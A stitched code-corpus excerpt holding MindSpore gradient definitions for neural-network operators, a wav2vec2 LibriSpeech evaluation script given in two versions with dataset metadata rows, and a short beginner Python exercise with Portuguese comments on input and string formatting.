        dgrad = tanh_grad(y, dout)
        return dy, dgrad
    return bprop
@bprop_getters.register(P.Gelu)
def get_bprop_gelu(self):
    """Grad definition for `Gelu` operation."""
    input_grad = G.GeluGrad()
    def bprop(x, out, dout):
        # GeluGrad needs both the forward input and output.
        dx = input_grad(dout, x, out)
        return (dx,)
    return bprop
@bprop_getters.register(P.FastGelu)
def get_bprop_fast_gelu(self):
    """Grad definition for `FastGelu` operation."""
    input_grad = G.FastGeluGrad()
    def bprop(x, out, dout):
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.FusedBatchNorm)
def get_bprop_fused_batch_norm(self):
    """Grad definition for `FusedBatchNorm` operation."""
    input_grad = G.FusedBatchNormGrad(self.epsilon, self.momentum)
    # The CPU grad kernel has a different signature (it also takes the bias),
    # so remember which variant was selected at registration time.
    target_cpu = False
    if self.target == "CPU":
        input_grad = G.FusedBatchNormGradCPU(self.epsilon, self.momentum)
        target_cpu = True
    def bprop(x, scale, b, mean, variance, out, dout):
        # out[3]/out[4] are the batch statistics saved by the forward pass.
        saved_mean = out[3]
        saved_variance = out[4]
        if target_cpu:
            out = input_grad(dout[0], x, scale, b, saved_mean, saved_variance)
        else:
            out = input_grad(dout[0], x, scale, saved_mean, saved_variance)
        dx = out[0]
        dscale = out[1]
        dbias = out[2]
        # The moving mean/variance are updated as side effects of the forward
        # op, not differentiated through.
        return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.FusedBatchNormEx)
def get_bprop_fused_batch_norm_ex(self):
    """Grad definition for `FusedBatchNormEx` operation."""
    input_grad = G.FusedBatchNormGradEx(self.epsilon, self.momentum, self.format)
    def bprop(x, scale, b, mean, variance, out, dout):
        # out[3]/out[4] are the saved batch statistics; out[5] is an extra
        # reserve buffer this Ex variant's grad kernel consumes.
        saved_mean = out[3]
        saved_variance = out[4]
        reserve = out[5]
        out = input_grad(dout[0], x, scale, saved_mean, saved_variance, reserve)
        dx = out[0]
        dscale = out[1]
        dbias = out[2]
        return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.InstanceNorm)
def get_bprop_instance_norm(self):
    """Grad definition for `InstanceNorm` operation."""
    is_training = self.is_training
    input_grad = G.InstanceNormGrad(is_training, self.epsilon, self.momentum)
    def bprop(x, gamma, beta, mean, variance, out, dout):
        # out[1]/out[2] are the per-instance statistics saved by the forward pass.
        saved_mean = out[1]
        saved_variance = out[2]
        out = input_grad(dout[0], x, gamma, saved_mean, saved_variance)
        dx = out[0]
        dgamma = out[1]
        dbeta = out[2]
        return dx, dgamma, dbeta, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.BatchNorm)
def get_bprop_batch_norm(self):
    """Grad definition for `BatchNorm` operation."""
    is_training = self.is_training
    input_grad = G.BatchNormGrad(is_training, self.epsilon)
    def bprop(x, scale, b, mean, variance, out, dout):
        # In training mode use the batch statistics saved by the forward pass;
        # in inference mode use the supplied moving mean/variance.
        if is_training:
            saved_reserve_1 = out[3]
            saved_reserve_2 = out[4]
        else:
            saved_reserve_1 = mean
            saved_reserve_2 = variance
        out = input_grad(dout[0], x, scale, saved_reserve_1, saved_reserve_2)
        dx = out[0]
        dscale = out[1]
        dbias = out[2]
        return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.LayerNorm)
def get_bprop_layer_norm(self):
    """Grad definition for `LayerNorm` operation."""
    layer_norm_grad = G.LayerNormGrad(self.begin_norm_axis, self.begin_params_axis)
    def bprop(x, gamma, beta, out, dout):
        # out[1]/out[2] are the statistics saved by the forward pass; the grad
        # kernel takes them in (variance, mean) order — hence out[2], out[1]
        # (see get_bprop_layer_norm_grad's signature below).
        dx, d_gamma, d_beta = layer_norm_grad(
            x, dout[0], out[2], out[1], gamma)
        return dx, d_gamma, d_beta
    return bprop
@bprop_getters.register(G.LayerNormGrad)
def get_bprop_layer_norm_grad(self):
    """Grad definition for `LayerNormGrad` operation (second-order layer norm grad)."""
    layer_norm_grad_grad = G.LayerNormGradGrad(self.begin_norm_axis, self.begin_params_axis)
    def bprop(x, dy, variance, mean, gamma, out, dout):
        d_x, d_dy, d_gamma = layer_norm_grad_grad(
            x, dy, variance, mean, gamma, dout[0], dout[1], dout[2])
        # The saved statistics are treated as constants.
        return d_x, d_dy, zeros_like(variance), zeros_like(mean), d_gamma
    return bprop
@bprop_getters.register(P.L2Normalize)
def get_bprop_l2normalize(self):
    """Grad definition for `L2Normalize` operation."""
    input_grad = G.L2NormalizeGrad(self.axis, self.epsilon)
    def bprop(x, out, dout):
        dx = input_grad(x, out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(P.SoftmaxCrossEntropyWithLogits)
def get_bprop_softmax_cross_entropy_with_logits(self):
    """Grad definition for `SoftmaxCrossEntropyWithLogits` operation."""
    expand = P.ExpandDims()
    def bprop(logits, labels, out, dout):
        # The forward pass already returns the per-sample logits gradient as
        # out[1]; scale it by the incoming loss gradient, broadcast over the
        # class dimension.
        grad = out[1]
        grad = grad * expand(dout[0], -1)
        return grad, zeros_like(labels)
    return bprop
@bprop_getters.register(P.NLLLoss)
def get_bprop_nll_loss(self):
    """Grad definition for `NLLLoss` operation."""
    nll_loss_grad = G.NLLLossGrad(reduction=self.reduction)
    def bprop(x, target, weight, out, dout):
        # out[1] is the total_weight computed by the forward pass.
        total_weight = out[1]
        dout_x = dout[0]
        dx = nll_loss_grad(x, dout_x, target, weight, total_weight)
        return dx, zeros_like(target), zeros_like(weight)
    return bprop
@bprop_getters.register(P.SparseSoftmaxCrossEntropyWithLogits)
def get_bprop_sparse_softmax_cross_entropy_with_logits(self):
    """Grad definition for `SparseSoftmaxCrossEntropyWithLogits` operation."""
    is_grad = self.is_grad
    grad_op = P.SparseSoftmaxCrossEntropyWithLogits(is_grad=True)
    def bprop(logits, labels, out, dout):
        grad = out[0]
        if not is_grad:
            # The forward op returned the loss, so rerun it in grad mode to
            # obtain the logits gradient; `depend` keeps the rerun ordered
            # after the forward computation.
            grad = grad_op(logits, labels)
            grad = F.depend(grad, out)
        grad = grad * dout
        return grad, zeros_like(labels)
    return bprop
@bprop_getters.register(P.ResizeBilinear)
def get_bprop_resize_bilinear(self):
    """Grad definition for `ResizeBilinear` operation."""
    resize_grad = G.ResizeBilinearGrad(self.align_corners)
    def bprop(x, out, dout):
        # The grad kernel takes the original input to recover the source size.
        dx = resize_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.OneHot)
def get_bprop_onehot(self):
    """Grad definition for `OneHot` operation (not differentiable; zero grads)."""
    def bprop(indices, depth, on_value, off_value, out, dout):
        return zeros_like(indices), zeros_like(depth), zeros_like(on_value), zeros_like(off_value)
    return bprop
@constexpr
def _range_op(start, limit, delta, dtype):
    """Create a constexpr 1-D tensor equivalent to range(start, limit, delta)."""
    output_tensor = Tensor(list(range(start, limit, delta)), dtype)
    return output_tensor
@constexpr
def _get_1d_shape(in_shape):
    """Collapse `in_shape` into a 1-tuple holding the total element count."""
    total = 1
    for dim in in_shape:
        total *= dim
    return (total,)
@bprop_getters.register(P.TopK)
def get_bprop_top_kv2(self):
    """Grad definition for `TopK` operation."""
    scatter = P.ScatterNd()
    expand_dims = P.ExpandDims()
    shape_op = P.Shape()
    reshape_op = P.Reshape()
    dtype = P.DType()
    def bprop(input_x, k, out, dout):
        # Scatter the incoming top-k gradients back to the positions recorded
        # by the forward indices (out[1]); every other position gets zero.
        in_shape = shape_op(input_x)
        in_lastdim = in_shape[-1]
        indices = out[1]
        ind_shape = shape_op(indices)
        ind_lastdim = ind_shape[-1]
        # Flatten to 2-D and convert per-row indices into absolute offsets
        # into the flattened input, so a single 1-D ScatterNd suffices.
        ind_2d = reshape_op(indices, (-1, ind_lastdim))
        outerdim = shape_op(ind_2d)[0]
        indices_dtype = dtype(indices)
        range_flatten_index = _range_op(0, outerdim * in_lastdim, in_lastdim, indices_dtype)
        ind = reshape_op(ind_2d + expand_dims(range_flatten_index, -1), (-1,))
        in_shape_1d = _get_1d_shape(in_shape)
        out_grad = reshape_op(
            scatter(
                expand_dims(ind, -1),
                reshape_op(dout[0], (-1,)),
                in_shape_1d),
            in_shape)
        return out_grad, zeros_like(k)
    return bprop
@bprop_getters.register(P.SmoothL1Loss)
def get_bprop_smooth_l1_loss(self):
    """Grad definition for `SmoothL1Loss` operation."""
    grad = G.SmoothL1LossGrad(self.beta)
    def bprop(prediction, target, out, dout):
        # Swapping the arguments flips the sign of the internal difference,
        # which yields the gradient with respect to `target`.
        dx = grad(prediction, target, dout)
        dy = grad(target, prediction, dout)
        return dx, dy
    return bprop
@bprop_getters.register(P.L2Loss)
def get_bprop_l2_loss(self):
    """Grad definition for `L2Loss` operation (loss = sum(x**2) / 2, so dx = x * dout)."""
    def bprop(x, out, dout):
        dx = x * dout
        return (dx,)
    return bprop
@bprop_getters.register(P.RNNTLoss)
def get_bprop_rnnt_loss(self):
    """Grad definition for `RNNTLoss` operation."""
    def bprop(acts, labels, act_lens, label_lens, out, dout):
        # The forward pass already returns the activations gradient as out[1].
        # NOTE(review): `dout` is never applied to `grad` — this assumes the
        # loss feeds the objective directly with unit gradient; confirm.
        grad = out[1]
        return grad, zeros_like(labels), zeros_like(act_lens), zeros_like(label_lens)
    return bprop
@bprop_getters.register(P.PReLU)
def get_bprop_prelu(self):
    """Grad definition for `PReLU` operation."""
    grad = G.PReLUGrad()
    def bprop(x, w, out, dout):
        # One kernel returns both the input grad and the slope-weight grad.
        dx, dw = grad(dout, x, w)
        return dx, dw
    return bprop
@bprop_getters.register(P.LSTM)
def get_bprop_lstm(self):
    """Grad definition for `LSTM` operation."""
    lstm_grad_data = G.LSTMGradData(
        input_size=self.input_size,
        hidden_size=self.hidden_size,
        num_layers=self.num_layers,
        has_bias=self.has_bias,
        bidirectional=self.bidirectional,
        dropout=self.dropout
    )
    lstm_grad_weight = G.LSTMGradWeight(
        input_size=self.input_size,
        hidden_size=self.hidden_size,
        num_layers=self.num_layers,
        has_bias=self.has_bias,
        bidirectional=self.bidirectional,
        dropout=self.dropout
    )
    lstm_grad = G.LSTMGrad(
        input_size=self.input_size,
        hidden_size=self.hidden_size,
        num_layers=self.num_layers,
        has_bias=self.has_bias,
        bidirectional=self.bidirectional,
        dropout=self.dropout
    )
    def bprop(x, hx, cx, w, out, dout):
        # Default path: data grads and weight grads come from two separate
        # kernels, both of which consume the forward reserve/state buffers.
        y, _, _, reserve, state = out
        dy, dhy, dcy, _, _ = dout
        dx, dhx, dcx = lstm_grad_data(y, dy, dhy, dcy, w, hx, cx, reserve, state)
        # depend() orders the weight grad after the data grad.
        dw = lstm_grad_weight(F.depend(x, dx), hx, y, reserve, state)
        return dx, dhx, dcx, dw
    def bprop_cpu(x, hx, cx, w, out, dout):
        # CPU path: one fused kernel returns all four gradients.
        y, hy, cy, reserve, _ = out
        dy, dhy, dcy, _, _ = dout
        dx, dhx, dcx, dw = lstm_grad(x, hx, cx, w, y, hy, cy, dy, dhy, dcy, reserve)
        return dx, dhx, dcx, dw
    if context.get_context('device_target') == "CPU":
        return bprop_cpu
    return bprop
@bprop_getters.register(P.DynamicRNN)
def get_bprop_dynamic_rnn(self):
    """Grad definition for `DynamicRNN` operation."""
    dynamic_rnn_grad = G.DynamicRNNGrad(cell_type=self.cell_type,
                                        direction=self.direction,
                                        cell_depth=self.cell_depth,
                                        use_peephole=self.use_peephole,
                                        keep_prob=self.keep_prob,
                                        cell_clip=self.cell_clip,
                                        num_proj=self.num_proj,
                                        time_major=self.time_major,
                                        forget_bias=self.forget_bias)
    expand_dims = P.ExpandDims()
    def bprop(x, w, b, seq_length, init_h, init_c, out, dout):
        dy, dh, dc, _, _, _, _, _, = dout
        # Only the last time step of the state gradients feeds the grad kernel.
        dh = dh[-1]
        dc = dc[-1]
        y, h, c, i, j, f, o, tanhct = out
        dw, db, dx, dh_prev, dc_prev = dynamic_rnn_grad(x, w, b, y, init_h[0], init_c[0], h,
                                                        c, dy, dh, dc, i, j, f, o, tanhct)
        # Restore the leading dimension stripped by init_h[0]/init_c[0] above.
        dh_prev = expand_dims(dh_prev, 0)
        dc_prev = expand_dims(dc_prev, 0)
        # seq_length is non-differentiable; (0) is its placeholder gradient.
        return dx, dw, db, (0), dh_prev, dc_prev
    return bprop
@bprop_getters.register(P.DynamicGRUV2)
def get_bprop_dynamic_gru_v2(self):
    """Grad definition for `DynamicGRUV2` operation."""
    dynamic_gru_v2_grad = G.DynamicGRUV2Grad(self.direction, self.cell_depth, self.keep_prob, self.cell_clip,
                                             self.num_proj, self.time_major, self.gate_order,
                                             self.reset_after)
    def bprop(x, winput, whidden, binput, bhidden, seq, init_h, out, dout):
        y, out_h, update, reset, new, hidden_new = out
        dy, dout_h, _, _, _, _ = dout
        # Only the last time step of the hidden-state gradient (dout_h[-1])
        # feeds the grad kernel, alongside the gate activations saved forward.
        dw_input, dw_hidden, db_input, db_hidden, dx, dh_prev = dynamic_gru_v2_grad(x, winput, whidden, y, init_h,
                                                                                    out_h, dy, dout_h[-1], update,
                                                                                    reset, new, hidden_new, None, None)
        # seq is non-differentiable; (0) is its placeholder gradient.
        return dx, dw_input, dw_hidden, db_input, db_hidden, (0), dh_prev
    return bprop
@bprop_getters.register(P.SigmoidCrossEntropyWithLogits)
def get_bprop_sigmoid_crossentropy_with_logits(self):
    """Grad definition for `SigmoidCrossEntropyWithLogits` operation."""
    op = G.SigmoidCrossEntropyWithLogitsGrad()
    def bprop(x, y, out, dout):
        dx = op(x, y, dout)
        return (dx, zeros_like(y))
    return bprop
@bprop_getters.register(P.Pad)
def get_bprop_pad(self):
    """Grad definition for `Pad` operation."""
    shape_op = P.Shape()
    paddings = self.paddings
    def bprop(x, out, dout):
        # Slice the padded gradient back to the original input window: start
        # at each dimension's leading pad amount and take the input's shape.
        begin = ()
        for item in paddings:
            begin += (item[0],)
        shp = shape_op(x)
        dx = P.Slice()(dout, begin, shp)
        return (dx,)
    return bprop
@bprop_getters.register(P.MirrorPad)
def get_bprop_mirror_pad(self):
    """Grad definition for `MirrorPad` operation."""
    mirror_pad_grad = G.MirrorPadGrad(self.mode)
    def bprop(x, paddings, out, dout):
        dx = mirror_pad_grad(dout, paddings)
        return (dx, zeros_like(paddings))
    return bprop
@bprop_getters.register(P.ROIAlign)
def get_bprop_roi_align(self):
    """Grad definition for `ROIAlign` operation."""
    shape_op = P.Shape()
    pooled_height = self.pooled_height
    pooled_width = self.pooled_width
    spatial_scale = self.spatial_scale
    sample_num = self.sample_num
    def bprop(inputs, rois, out, dout):
        inputs_shape = shape_op(inputs)
        # The grad op is constructed inside bprop because it takes the
        # feature-map shape as a constructor argument.
        dx = G.ROIAlignGrad(inputs_shape,
                            pooled_height,
                            pooled_width,
                            spatial_scale,
                            sample_num,
                            )(dout, rois)
        return dx, zeros_like(rois)
    return bprop
@bprop_getters.register(P.Conv2DBackpropInput)
def get_bprop_conv2d_backprop_input(self):
    """Grad definition for `Conv2DBackpropInput` operation."""
    filter_grad = G.Conv2DBackpropFilter(
        self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    input_grad = P.Conv2D(
        self.out_channel, self.kernel_size, pad_mode=self.pad_mode.lower(), pad=self.pad,
        dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
    )
    def bprop(x, w, f_sizes, out, dout):
        dx = input_grad(dout, w)
        # env_force_bprop_seq is a module-level switch (presumably read from an
        # environment variable at import time — confirm); when '1', serialize
        # the two grad computations by making the filter grad depend on dx.
        if env_force_bprop_seq == '1':
            x = F.depend(x, dx)
        dw = filter_grad(x, dout, F.shape(w))
        return dx, dw, zeros_like(f_sizes)
    return bprop
@bprop_getters.register(P.BinaryCrossEntropy)
def get_bprop_binary_cross_entropy(self):
    """Grad definition for `BinaryCrossEntropy` operation."""
    grad = G.BinaryCrossEntropyGrad(self.reduction)
    def bprop(x, y, weight, out, dout):
        dx = grad(x, y, dout, weight)
        return dx, zeros_like(y), zeros_like(weight)
    return bprop
@bprop_getters.register(P.KLDivLoss)
def get_bprop_kl_div_loss(self):
    """Grad definition for `KLDivLoss` operation."""
    grad = G.KLDivLossGrad(self.reduction)
    def bprop(x, y, out, dout):
        # One kernel returns gradients for both inputs.
        dx, dy = grad(x, y, dout)
        return dx, dy
    return bprop
@bprop_getters.register(P.Dropout)
def get_bprop_dropout(self):
    """Grad definition for `Dropout` operation."""
    grad = G.DropoutGrad(self.keep_prob)
    def bprop(x, out, dout):
        # Forward returns (output, mask); replay the saved mask on the
        # output's incoming gradient.
        _, mask = out
        dy, _ = dout
        dx = grad(dy, mask)
        return (dx,)
    return bprop
@bprop_getters.register(P.CTCLoss)
def get_bprop_ctc_loss(self):
    """Grad definition for `CTCLoss` operation."""
    expand = P.ExpandDims()
    def bprop(inputs, labels_indices, labels_values, sequence_length, out, dout):
        # out[1] is the inputs gradient computed by the forward pass; scale it
        # by the incoming loss gradient, broadcast over the class dimension.
        grad_loss = out[1]
        grad = grad_loss * expand(dout[0], -1)
        return grad, zeros_like(labels_indices), zeros_like(labels_values), zeros_like(sequence_length)
    return bprop
@bprop_getters.register(P.BasicLSTMCell)
def get_bprop_basic_lstm_cell(self):
    """Grad definition for `BasicLSTMCell` operation."""
    basic_lstm_cell_cstate_grad = G.BasicLSTMCellCStateGrad(
        forget_bias=self.forget_bias,
        activation=self.activation
    )
    basic_lstm_cell_weight_grad = G.BasicLSTMCellWeightGrad()
    basic_lstm_cell_input_grad = G.BasicLSTMCellInputGrad(keep_prob=self.keep_prob)
    def bprop(x, h, c, w, b, out, dout):
        # Forward outputs are (ct, ht, it, jt, ft, ot, tanhct) — dout unpacks
        # the matching (dct, dht, ...) positions; only the gate activations
        # are needed from out here.
        _, _, it, jt, ft, ot, tanhct = out
        dct, dht, _, _, _, _, _ = dout
        dgate, dct_1 = basic_lstm_cell_cstate_grad(c, dht, dct, it, jt, ft, ot, tanhct)
        dxt, dht = basic_lstm_cell_input_grad(dgate, w)
        # depend() forces the weight grad to run after the input grad.
        dw, db = basic_lstm_cell_weight_grad(F.depend(x, dxt), h, dgate)
        return dxt, dht, dct_1, dw, db
    return bprop
@bprop_getters.register(P.LRN)
def get_bprop_lrn(self):
    """Grad definition for `LRN` operation."""
    grad = G.LRNGrad(self.depth_radius, self.bias, self.alpha, self.beta)
    def bprop(x, out, dout):
        # LRNGrad needs both the forward input and the forward output.
        dx = grad(dout, x, out)
        return (dx,)
    return bprop
| true | true |
f722ed27fc2d0b1605d157e7f5caaaf6ffadd8cf | 5,039 | py | Python | example/evalutate_wav2vec2/evaluate_wav2vec2_librispeech.py | mthrok/ctcdecode | b1a30d7a65342012e0d2524d9bae1c5412b24a23 | [
"MIT"
] | 8 | 2021-06-17T19:43:36.000Z | 2021-10-12T04:49:36.000Z | example/evalutate_wav2vec2/evaluate_wav2vec2_librispeech.py | mthrok/ctcdecode | b1a30d7a65342012e0d2524d9bae1c5412b24a23 | [
"MIT"
] | null | null | null | example/evalutate_wav2vec2/evaluate_wav2vec2_librispeech.py | mthrok/ctcdecode | b1a30d7a65342012e0d2524d9bae1c5412b24a23 | [
"MIT"
] | 2 | 2021-07-14T06:15:55.000Z | 2021-08-01T14:00:22.000Z | #!/usr/bin/env python3
"""Generate `trn` files for Librispeech
Given a Librispeech directory, parse transcript files,
transcribe the corresponding audio, and generate hypothesis files.
"""
import os
import time
import logging
import argparse
from pathlib import Path
import torch
import torchaudio
import fairseq
import simple_ctc
_LG = logging.getLogger(__name__)
def _parse_args():
def _path(path):
return Path(os.path.normpath(path))
parser = argparse.ArgumentParser(
description=__doc__,
)
parser.add_argument(
'--root-dir',
required=True,
type=_path,
help='The root directory on which data are persed.'
)
parser.add_argument(
'--output-dir',
required=True,
type=_path,
help='The output directory where trn files are generated.'
)
parser.add_argument(
'--model-file',
required=True,
type=_path,
help='Path to a finetuned weight file.'
)
parser.add_argument(
'--dict-file',
required=True,
type=_path,
help='Path to `dict.ltr.txt` file.'
)
parser.add_argument(
'--num-threads',
type=int,
default=4,
help='Maximum number of threads .'
)
args = parser.parse_args()
for path in [args.root_dir, args.output_dir, args.model_file, args.dict_file]:
if not os.path.exists(path):
raise RuntimeError(f'File or directory does not exist: {path}')
return args
def _parse_transcript(path):
with open(path) as trans_fileobj:
for line in trans_fileobj:
line = line.strip()
if not line:
continue
id, transcription = line.split(' ', maxsplit=1)
yield id, transcription
def _parse_transcriptions(root_dir, output_dir):
    """Collect all transcripts under `root_dir` into reference trn/trans files
    and return the (utterance_id, audio_path) pairs to transcribe."""
    _LG.info('Parsing transcriptions')
    audios = []
    ref_trn_path = output_dir / 'ref.trn'
    ref_txt_path = output_dir / 'ref.trans.txt'
    with open(ref_trn_path, 'w') as trn_out, open(ref_txt_path, 'w') as txt_out:
        for trans_file in root_dir.glob('**/*.trans.txt'):
            audio_dir = trans_file.parent
            for utt_id, text in _parse_transcript(trans_file):
                trn_out.write(f'{text} ({utt_id})\n')
                txt_out.write(f'{utt_id} {text}\n')
                audios.append((utt_id, audio_dir / f'{utt_id}.flac'))
    return audios
def _load_vocab(dict_file):
tokens = ["<s>", "<pad>", "</s>", "<unk>"]
with open(dict_file, mode='r', encoding='utf-8') as fileobj:
for line in fileobj:
tokens.append(line.split()[0])
return tokens
def _count_params(model):
return sum(p.numel() for p in model.parameters())
def _load_model(model_file, dict_file):
    """Load the fine-tuned wav2vec2 checkpoint and build a CTC beam-search decoder.

    Returns:
        (encoder, decoder): the wav2vec2 encoder module in eval mode and a
        `simple_ctc.BeamSearchDecoder` configured over its label set.
    """
    _LG.info('Loading the model')
    labels = _load_vocab(dict_file)
    # fairseq resolves the task's `data` directory from the checkpoint; point
    # it at the directory containing the dictionary file instead.
    overrides = {'data': str(dict_file.parent)}
    models, _, _ = fairseq.checkpoint_utils.load_model_ensemble_and_task(
        [str(model_file)], arg_overrides=overrides
    )
    model = models[0].eval()
    encoder = model.w2v_encoder
    decoder = simple_ctc.BeamSearchDecoder(
        labels,
        cutoff_top_n=40,
        cutoff_prob=0.8,
        beam_size=100,
        num_processes=1,
        # blank_id=0 matches "<s>" being first in the label list.
        blank_id=0,
        # is_nll=True: the encoder emits negative-log-likelihood-style scores
        # rather than probabilities — presumably; confirm against simple_ctc docs.
        is_nll=True,
    )
    _LG.info('#parameters: %s', _count_params(encoder))
    return encoder, decoder
def _decode(audios, encoder, decoder, output_dir):
    """Transcribe every audio file, write hypothesis trn/trans files, and log
    cumulative encode/decode timings at the end."""
    trn = output_dir / 'hyp.trn'
    trans = output_dir / 'hyp.trans.txt'
    t_enc, t_dec, num_frames = 0.0, 0.0, 0
    with open(trn, 'w') as trn_fileobj, open(trans, 'w') as txt_fileobj:
        for i, (id, path) in enumerate(audios):
            waveform, _ = torchaudio.load(path)
            # All-zeros padding mask: every frame is valid.
            mask = torch.zeros_like(waveform)
            t0 = time.monotonic()
            ir = encoder(waveform, mask)['encoder_out'].transpose(1, 0)
            t1 = time.monotonic()
            result = decoder.decode(ir)
            t2 = time.monotonic()
            # '|' marks word boundaries in the letter vocabulary, hence the
            # replacement with spaces.  NOTE: this rebinding shadows the `trn`
            # Path above — harmless, that file is already open.
            trn = ''.join(result.label_sequences[0][0]).replace('|', ' ')
            trn_fileobj.write(f'{trn} ({id})\n')
            txt_fileobj.write(f'{id} {trn}\n')
            _LG.info('%d/%d: %s: %s', i, len(audios), id, trn)
            num_frames += waveform.size(1)
            t_enc += t1 - t0
            t_dec += t2 - t1
    # 16000: LibriSpeech sample rate — assumed, not read from the files.
    t_audio = num_frames / 16000
    _LG.info('Audio duration: %s [sec]', t_audio)
    _LG.info('Encoding Time: %s [sec]', t_enc)
    _LG.info('Decoding Time: %s [sec]', t_dec)
    _LG.info('Total Inference Time: %s [sec]', t_enc + t_dec)
def _main():
    """Entry point: parse args, configure the runtime, then transcribe the corpus."""
    args = _parse_args()
    torch.set_num_threads(args.num_threads)
    logging.basicConfig(
        format='%(asctime)s %(levelname)s: %(message)s',
        level=logging.INFO)
    audios = _parse_transcriptions(args.root_dir, args.output_dir)
    encoder, decoder = _load_model(args.model_file, args.dict_file)
    _decode(audios, encoder, decoder, args.output_dir)
# Only run when executed as a script, not when imported.
if __name__ == '__main__':
    _main()
| 29.127168 | 82 | 0.60647 |
import os
import time
import logging
import argparse
from pathlib import Path
import torch
import torchaudio
import fairseq
import simple_ctc
_LG = logging.getLogger(__name__)
def _parse_args():
def _path(path):
return Path(os.path.normpath(path))
parser = argparse.ArgumentParser(
description=__doc__,
)
parser.add_argument(
'--root-dir',
required=True,
type=_path,
help='The root directory on which data are persed.'
)
parser.add_argument(
'--output-dir',
required=True,
type=_path,
help='The output directory where trn files are generated.'
)
parser.add_argument(
'--model-file',
required=True,
type=_path,
help='Path to a finetuned weight file.'
)
parser.add_argument(
'--dict-file',
required=True,
type=_path,
help='Path to `dict.ltr.txt` file.'
)
parser.add_argument(
'--num-threads',
type=int,
default=4,
help='Maximum number of threads .'
)
args = parser.parse_args()
for path in [args.root_dir, args.output_dir, args.model_file, args.dict_file]:
if not os.path.exists(path):
raise RuntimeError(f'File or directory does not exist: {path}')
return args
def _parse_transcript(path):
with open(path) as trans_fileobj:
for line in trans_fileobj:
line = line.strip()
if not line:
continue
id, transcription = line.split(' ', maxsplit=1)
yield id, transcription
def _parse_transcriptions(root_dir, output_dir):
_LG.info('Parsing transcriptions')
audios = []
trn = output_dir / 'ref.trn'
txt = output_dir / 'ref.trans.txt'
with open(trn, 'w') as trn_fileobj, open(txt, 'w') as txt_fileobj:
for trans_file in root_dir.glob('**/*.trans.txt'):
trans_dir = trans_file.parent
for id, transcription in _parse_transcript(trans_file):
trn_fileobj.write(f'{transcription} ({id})\n')
txt_fileobj.write(f'{id} {transcription}\n')
audio_path = trans_dir / f'{id}.flac'
audios.append((id, audio_path))
return audios
def _load_vocab(dict_file):
tokens = ["<s>", "<pad>", "</s>", "<unk>"]
with open(dict_file, mode='r', encoding='utf-8') as fileobj:
for line in fileobj:
tokens.append(line.split()[0])
return tokens
def _count_params(model):
return sum(p.numel() for p in model.parameters())
def _load_model(model_file, dict_file):
_LG.info('Loading the model')
labels = _load_vocab(dict_file)
overrides = {'data': str(dict_file.parent)}
models, _, _ = fairseq.checkpoint_utils.load_model_ensemble_and_task(
[str(model_file)], arg_overrides=overrides
)
model = models[0].eval()
encoder = model.w2v_encoder
decoder = simple_ctc.BeamSearchDecoder(
labels,
cutoff_top_n=40,
cutoff_prob=0.8,
beam_size=100,
num_processes=1,
blank_id=0,
is_nll=True,
)
_LG.info('#parameters: %s', _count_params(encoder))
return encoder, decoder
def _decode(audios, encoder, decoder, output_dir):
trn = output_dir / 'hyp.trn'
trans = output_dir / 'hyp.trans.txt'
t_enc, t_dec, num_frames = 0.0, 0.0, 0
with open(trn, 'w') as trn_fileobj, open(trans, 'w') as txt_fileobj:
for i, (id, path) in enumerate(audios):
waveform, _ = torchaudio.load(path)
mask = torch.zeros_like(waveform)
t0 = time.monotonic()
ir = encoder(waveform, mask)['encoder_out'].transpose(1, 0)
t1 = time.monotonic()
result = decoder.decode(ir)
t2 = time.monotonic()
trn = ''.join(result.label_sequences[0][0]).replace('|', ' ')
trn_fileobj.write(f'{trn} ({id})\n')
txt_fileobj.write(f'{id} {trn}\n')
_LG.info('%d/%d: %s: %s', i, len(audios), id, trn)
num_frames += waveform.size(1)
t_enc += t1 - t0
t_dec += t2 - t1
t_audio = num_frames / 16000
_LG.info('Audio duration: %s [sec]', t_audio)
_LG.info('Encoding Time: %s [sec]', t_enc)
_LG.info('Decoding Time: %s [sec]', t_dec)
_LG.info('Total Inference Time: %s [sec]', t_enc + t_dec)
def _main():
args = _parse_args()
torch.set_num_threads(args.num_threads)
logging.basicConfig(
format='%(asctime)s %(levelname)s: %(message)s',
level=logging.INFO)
audios = _parse_transcriptions(args.root_dir, args.output_dir)
encoder, decoder = _load_model(args.model_file, args.dict_file)
_decode(audios, encoder, decoder, args.output_dir)
if __name__ == '__main__':
_main()
| true | true |
f722ed2d78ffd31704a3828c381652fbd174ab85 | 1,115 | py | Python | curso_em_video/mundo_1/exs_python/ExPy002.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | 1 | 2020-09-19T21:39:12.000Z | 2020-09-19T21:39:12.000Z | curso_em_video/mundo_1/exs_python/ExPy002.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | curso_em_video/mundo_1/exs_python/ExPy002.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | n = str(input('Digite o nome: '))
#Função input(): tem por objetivo de escrever a String passada como parâmetro e em seguida, ativar o modo de digitação, isto é, colocar o Console de uma determinada forma em que seja possível a digitação (entrada de dados).
#faz uma pausa no programa e espera uma entrada do usuário pelo terminal. Para ler a entrada do usuário a função input() espera que após digitada a entrada o usuário aperte a tecla enter, após isso input() lê essa entrada como uma string, portanto, se a entrada esperada for um número ela deve ser convertida usando-se as funções de conversão int() ou float().
print(f'É um prazer te conhecer, {n}')
#String literal formatada: comece uma string com f ou F, antes de abrir as aspas ou aspas triplas. Dentro dessa string, pode-se escrever uma expressão Python entre caracteres { e }, que podem se referir a variáveis, ou valores literais.
print('É um prazer te conhecer, ', n)
print('Olá {0}, é um prazer te conhecer.'.format(n))
#Método format(): serve para criar uma string que contem campos entre chaves a serem substituídos pelos argumentos de format.
